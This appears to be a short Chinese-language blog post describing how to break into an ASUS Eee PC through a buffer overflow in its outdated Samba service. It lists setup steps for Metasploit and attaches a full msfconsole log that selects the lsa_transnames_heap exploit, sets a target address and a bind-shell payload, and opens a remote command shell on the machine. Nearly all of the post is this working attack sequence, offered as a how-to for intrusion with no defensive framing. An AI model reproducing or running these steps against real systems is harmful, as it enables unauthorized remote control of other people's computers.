由於 ASUS 的 eee pc 使用舊版的 samba, 有 buffer overflow 的 bug
我們可以使用 Metasploit 這一類的 exploit 工具輕易地入侵 eee pc,
以下介紹 Linux 上的作法
1. 準備一個支援 ruby 的 Linux 電腦
2. 從 http://framework.metasploit.com 下載 Metasploit Framework 並安裝
3. 執行附件中的msf指令, 自 msf 的 console 將 exploit code 注入 eee pc 並建立控制通道
4. 經由控制通道, 可以執行 uname 等指令控制 eee pc
uname -a
Linux eeepc-agneshuan 2.6.21.4-eeepc #2 Mon Sep 24 14:09:46 EDT 2007 i686 GNU/Linux
(附件, msfconsole 指令)
[root@AX-HOST framework-3.1]# ./msfconsole
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.192.6.112
RHOST => 192.192.6.112
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.192.6.66:33929 -> 192.192.6.112:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
沒有留言:
張貼留言